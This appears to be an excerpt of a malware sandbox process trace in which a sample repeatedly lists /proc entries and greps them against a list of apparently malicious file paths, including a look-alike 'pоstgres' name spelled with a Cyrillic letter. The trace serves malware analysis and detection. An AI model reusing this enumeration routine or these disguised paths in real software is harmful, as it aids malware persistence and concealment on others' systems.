/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1223
-
-
/bin/grepgrep exe2⤵PID:1226
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1225
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1228
-
-
/bin/grepgrep exe2⤵PID:1231
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1230
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1233
-
-
/bin/grepgrep exe2⤵PID:1236
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1235
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1238
-
-
/bin/grepgrep exe2⤵PID:1241
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1240
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1243
-
-
/bin/grepgrep exe2⤵PID:1246
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1245
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1248
-
-
/bin/grepgrep exe2⤵PID:1251
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1250
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1253
-
-
/bin/grepgrep exe2⤵PID:1256
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1255
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1258
-
-
/bin/grepgrep exe2⤵PID:1261
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1260
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1263
-
-
/bin/grepgrep exe2⤵PID:1266
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1265
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1268
-
-
/bin/grepgrep exe2⤵PID:1271
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1270
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1273
-
-
/bin/grepgrep exe2⤵PID:1276
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1275
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1278
-
-
/bin/grepgrep exe2⤵PID:1281
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1280
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1284
-
-
/bin/grepgrep exe2⤵PID:1288
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1287
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1290
-
-
/bin/grepgrep exe2⤵PID:1294
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1293
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1297
-
-
/bin/grepgrep exe2⤵PID:1301
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1300
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1304
-
-
/bin/grepgrep exe2⤵PID:1307
-
-
/bin/lsls -latrh /proc/net2⤵PID:1306
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1310
-
-
/bin/grepgrep exe2⤵PID:1314
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1313
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1316
-
-
/bin/grepgrep exe2⤵PID:1320
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1319
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1323
-
-
/bin/grepgrep exe2⤵PID:1326
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1325
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1330
-
-
/bin/grepgrep exe2⤵PID:1333
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1332
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1336
-
-
/bin/grepgrep exe2⤵PID:1340
-
-
/bin/lsls -latrh /proc/self2⤵PID:1339
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1342
-
-
/bin/grepgrep exe2⤵PID:1346
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1345
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1349
-
-
/bin/grepgrep exe2⤵PID:1353
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1352
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1356
-
-
/bin/grepgrep exe2⤵PID:1359
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1358
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1362
-
-
/bin/grepgrep exe2⤵PID:1366
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1365
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1368
-
-
/bin/grepgrep exe2⤵PID:1372
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1371
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1375
-
-
/bin/grepgrep exe2⤵PID:1379
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1378
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1382
-
-
/bin/grepgrep exe2⤵PID:1385
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1384
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1389
-
-
/bin/grepgrep exe2⤵PID:1392
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1391
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1394
-
-
/bin/grepgrep exe2⤵PID:1398
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1397
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1401
-
-
/bin/grepgrep exe2⤵PID:1405
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1404
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1408
-
-
/bin/grepgrep exe2⤵PID:1411
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1410
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1413
-
-
/bin/grepgrep exe2⤵PID:1416
-
-
/bin/lsls -latrh /proc/version2⤵PID:1415
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1418
-
-
/bin/grepgrep exe2⤵PID:1421
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1420
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1423
-
-
/bin/grepgrep exe2⤵PID:1426
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1425
-
-
